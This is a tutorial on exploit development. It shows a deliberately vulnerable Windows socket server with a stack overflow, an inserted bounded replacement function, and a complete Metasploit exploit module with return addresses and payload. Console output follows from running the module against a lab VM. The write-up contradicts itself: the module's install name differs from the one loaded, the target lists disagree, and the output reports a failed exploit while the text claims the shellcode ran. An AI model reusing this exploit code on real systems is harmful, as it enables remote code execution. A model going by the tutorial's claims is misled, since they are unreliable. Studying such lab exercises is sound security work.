A simple test: publishing a PoC with MSF

Let's look at a piece of vulnerable code:

#include <winsock2.h>
#include <iostream>
#include <cstring>
#include <cstdlib>
#pragma comment(lib, "ws2_32.lib")
using namespace std;

// Deliberately vulnerable: strcpy() copies the whole client message into a
// 200-byte stack buffer with no length check, so a longer message overwrites
// what lies above the buffer on the stack, including the saved return address.
void msg_display(char *buf)
{
	char msg[200];
	strcpy(msg, buf);
	cout << "****************" << endl;
	cout << msg << endl;
}

int main()
{
	SOCKET sock, msgsock;
	int length, receive_len;            // recv()/accept() lengths are ints, not SOCKETs
	struct sockaddr_in sock_server, sock_client;
	char buf[0x200];

	WSADATA wsa;
	WSAStartup(MAKEWORD(1, 1), &wsa);
	if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
	{
		cout << sock << " Socket Creating Error!" << endl;
		exit(1);
	}

	sock_server.sin_family = AF_INET;
	sock_server.sin_port = htons(7777);
	sock_server.sin_addr.S_un.S_addr = INADDR_ANY;
	if (bind(sock, (sockaddr *)&sock_server, sizeof(sock_server)))
	{
		cout << "binding stream socket error!" << endl;
	}
	cout << "**********************************" << endl;
	cout << "   exploit target server 1.0      " << endl;
	cout << "**********************************" << endl;
	listen(sock, 4);
	length = sizeof(struct sockaddr);
	do
	{
		msgsock = accept(sock, (struct sockaddr *)&sock_client, &length);
		if (msgsock == INVALID_SOCKET)
		{
			cout << "accept error!" << endl;
			break;
		}
		else
			do
			{
				// Zeroing the buffer NUL-terminates short messages; a message
				// that fills all 0x200 bytes has no terminator at all.
				memset(buf, 0, sizeof(buf));
				if ((receive_len = recv(msgsock, buf, sizeof(buf), 0)) < 0)
				{
					cout << "reading stream message error!" << endl;
					receive_len = 0;
				}
				msg_display(buf);
			} while (receive_len);
		closesocket(msgsock);
	} while (1);
	WSACleanup();
	return 0;
}
msg_display contains a stack overflow. The server test environment is a Windows 2000 Server virtual machine; run the program there so it listens on port 7777.
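For comparison, here is a bounded replacement for msg_display that removes the overflow. This is an added example, not code from the page or the book: the function name msg_display_safe, its received_len parameter, the return convention and the demo_message helper are this example's assumptions. It keeps the same 200-byte stack buffer as the server above, but bounds the copy by both the destination size and the length recv() actually returned, which also covers the case where a client fills all 0x200 bytes of the receive buffer and leaves no NUL terminator for strcpy to stop at.

```c
#include <stdio.h>
#include <string.h>

/* Added example (not the page's own code): a bounded replacement for the
 * page's msg_display(). The function name, the received_len parameter and
 * the return convention are this example's assumptions. The destination is
 * the same 200-byte stack buffer the original server uses. */
#define MSG_MAX  200
#define RECV_MAX 0x200   /* size of the server's recv() buffer on the page */

/* Length of buf up to the first NUL, but never beyond limit: the server's
 * buffer is only NUL-terminated when the client sends fewer than RECV_MAX
 * bytes, so a plain strlen() could itself read past the end. */
static size_t bounded_len(const char *buf, size_t limit)
{
    size_t n = 0;
    while (n < limit && buf[n] != '\0')
        n++;
    return n;
}

/* Returns 1 when the message fit and was printed, 0 when it was rejected as
 * too long. Never writes past msg[MSG_MAX - 1]. */
int msg_display_safe(const char *buf, size_t received_len)
{
    char msg[MSG_MAX];
    size_t len = bounded_len(buf, received_len);

    if (len >= sizeof(msg)) {
        /* Refuse rather than silently truncate: truncation avoids the crash
         * but still lets a client make the server print a mangled message. */
        fprintf(stderr, "message of %lu bytes exceeds %lu-byte limit, dropped\n",
                (unsigned long)len, (unsigned long)(sizeof(msg) - 1));
        return 0;
    }
    memcpy(msg, buf, len);
    msg[len] = '\0';
    puts("****************");
    puts(msg);
    return 1;
}

/* Constructed input standing in for what recv() hands the server: n bytes of
 * 'a' in a RECV_MAX-byte buffer that was zeroed first, exactly as the server
 * does, so there is no terminator when n == RECV_MAX. Returns
 * msg_display_safe()'s verdict, or -1 if n does not fit the receive buffer. */
int demo_message(size_t n)
{
    char buf[RECV_MAX];
    if (n > sizeof(buf))
        return -1;
    memset(buf, 0, sizeof(buf));
    memset(buf, 'a', n);
    return msg_display_safe(buf, n);
}

int main(void)
{
    demo_message(5);             /* short message: printed, returns 1 */
    demo_message(MSG_MAX - 1);   /* 199 bytes: largest that fits, returns 1 */
    demo_message(MSG_MAX);       /* 200 bytes: the original strcpy would already
                                    write one byte too many; here returns 0 */
    demo_message(RECV_MAX);      /* full buffer, no NUL anywhere: returns 0 */
    return 0;
}
```

The 199-byte boundary is the point to check: the original strcpy needs room for the terminator, so a 200-byte message is already one byte too long, and the bounded version rejects it for the same reason.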

Now look at a Ruby script:

#!/usr/bin/env ruby
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  include Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Evil0r_POC',
      'Version'        => '1.0',
      'Platform'       => 'win',
      'Privileged'     => true,
      'License'        => MSF_LICENSE,
      'Author'         => 'Evil0r',
      # 'Ret' => [ padding length before the saved return address, address written over it ]
      'Targets'        => [
        ['Windows 2000',   { 'Ret' => [200, 0x77F8948B] }],
        ['Windows XP SP2', { 'Ret' => [200, 0x7C914393] }],
      ],
      'DefaultTarget'  => 0,
      'Payload'        => {
        'Space'           => 200,
        'BadChars'        => "\x00",
        'StackAdjustment' => -3500,
      },
      'Description'    => %q{
        This module is an exploit practice from the book
        "Vulnerability Exploit and Analysis Technique",
        used only for educational purposes.
      },
      'Arch'           => 'x86',
      'References'     => [
        [ 'URL', 'http://blog.csdn.net/evi10r' ],
        [ 'CVE', '44444' ],
      ],
      'DefaultOptions' => { 'EXITFUNC' => 'process' }
    ))
  end # end of initialize

  def exploit
    connect
    print_status("Sending #{payload.encoded.length} byte payload...")
    buf = 'a' * target['Ret'][0]          # padding up to the saved return address
    buf << [target['Ret'][1]].pack('V')   # target-specific return address, little-endian
    buf << payload.encoded                # encoded payload follows
    sock.put(buf)
    handler
    disconnect
  end # end of exploit def
end
Put Evil0r_Poc.rb under the exploits directory (create a new folder for it), then open the console; show exploits will list the module we just added.

You can run info to view the module's details:

msf > info Evil0r/Evil0r_Poc


       Name: Evil0r_POC
    Version: 1.0
   Platform: Windows
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Normal


Provided by:
  Evil0r


Available targets:
  Id  Name
  --  ----
  0   Windows 2000
  1   Windows XP SP2


Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST                   yes       The target address
  RPORT                   yes       The target port


Payload information:
  Space: 200
  Avoid: 1 characters


Description:
  this module is exploit practice of book "Vulnerability Exploit and 
  Analysis Technique" used only for educational purpose


References:
  http://blog.csdn.net/evi10r
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=44444

Now we use it to run an attack test against the Windows 2000 Server virtual machine.

msf > use failwest/est
[-] Failed to load module: failwest/est
msf > use failwest/test
msf exploit(test) > show targets


Exploit targets:


   Id  Name
   --  ----
   0   Windows 2000
   1   Windows XP SP3




msf exploit(test) > set target 0
target => 0
msf exploit(test) > show payloads


Compatible Payloads
===================


   Name                                         Rank    Description
   ----                                         ----    -----------
   generic/debug_trap                           normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                       normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                    normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                           normal  Generic x86 Tight Loop
   windows/dllinject/reverse_nonx_tcp           normal  Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)
   windows/dllinject/reverse_ord_tcp            normal  Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/exec                                 normal  Windows Execute Command
   windows/meterpreter/reverse_nonx_tcp         normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_ord_tcp          normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/metsvc_bind_tcp                      normal  Windows Meterpreter Service, Bind TCP
   windows/metsvc_reverse_tcp                   normal  Windows Meterpreter Service, Reverse TCP Inline
   windows/patchupdllinject/reverse_nonx_tcp    normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_ord_tcp     normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_nonx_tcp  normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_ord_tcp   normal  Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupvncinject/reverse_nonx_tcp    normal  Windows VNC Inject (skape/jt injection), Reverse TCP Stager (No NX or Win7)
   windows/patchupvncinject/reverse_ord_tcp     normal  Windows VNC Inject (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/shell/reverse_nonx_tcp               normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   windows/shell/reverse_ord_tcp                normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/upexec/reverse_nonx_tcp              normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   windows/upexec/reverse_ord_tcp               normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/vncinject/reverse_nonx_tcp           normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/vncinject/reverse_ord_tcp            normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)


msf exploit(test) > set payload windows/exec
payload => windows/exec
msf exploit(test) > show options


Module options:


   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT                   yes       The target port




Payload options (windows/exec):


   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD                        yes       The command string to execute
   EXITFUNC  process          yes       Exit technique: seh, thread, process




Exploit target:


   Id  Name
   --  ----
   0   Windows 2000




msf exploit(test) > set rhost 192.168.79.132
rhost => 192.168.79.132
msf exploit(test) > set rport 7777
rport => 7777
msf exploit(test) > set cmd calc
cmd => calc
msf exploit(test) > set exitfunc seh
exitfunc => seh
msf exploit(test) > exploit


[-] Exploit failed: No encoders encoded the buffer successfully.
[*] Exploit completed, but no session was created.


Then we see the calculator window pop up on the Windows 2000 VM: the shellcode executed successfully.

(Figure 1: screenshot)
